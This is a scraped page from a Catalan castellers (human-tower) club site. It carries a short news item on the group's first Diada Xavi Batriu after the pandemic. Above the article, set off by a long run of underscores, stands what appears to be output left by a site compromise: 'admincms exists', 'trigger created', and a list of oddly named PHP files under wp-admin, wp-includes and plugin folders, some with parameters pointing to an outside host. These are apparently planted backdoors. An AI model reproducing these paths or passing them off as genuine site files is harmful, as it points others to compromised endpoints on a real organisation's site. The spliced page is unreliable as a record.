Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?core https://castellersdeberga.cat/wp-admin/network/admin-ajax-ajax-response-stream-meta-ajax-response.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/network-private-meta-core-private-stream.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/moderation-wp-ajax-response-ajax-ajax-response-ajax-ajax-response-stream-ajax.php https://castellersdeberga.cat/wp-content/plugins/woocommerce/woocommerce-ajax-response-cron-ajax-private-meta-ajax-response.php https://castellersdeberga.cat/wp-content/plugins/woocommerce/woocommerce-ajax-response-core-stream-wp-ajax-response.php https://castellersdeberga.cat/wp-includes/blocks/cover-ajax.php https://castellersdeberga.cat/wp-includes/customize/class-wp-customize-date-time-control-core-meta-stream-cron-core.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Tornem a actuar, a la primera Diada Xavi Batriu
 

Tornem a actuar, a la primera Diada Xavi Batriu


Tornem a actuar, a la primera Diada Xavi BatriuDos anys després de l’última diada, hem tornat. Va ser dissabte 6 de novembre, a la Plaça de Sant Pere. La primera Diada Xavi Batriu Sibila, en honor al company de la colla que va morir el febrer de 2020.

En una diada marcada encara per les restriccions per la pandèmia de la COVID-19, vam descarregar el 3 de 7, el 4 de 7 i el 5 de 6. Els Minyons de Terrassa van ser la colla convidada i hi van descarregar el 3 de 8, el 4 de 8 i el 5 de 7. També hi va participar la Colla Castellera de Cerdanya, de la qual els berguedans en som padrins. Hi van alçar un pilar de 4.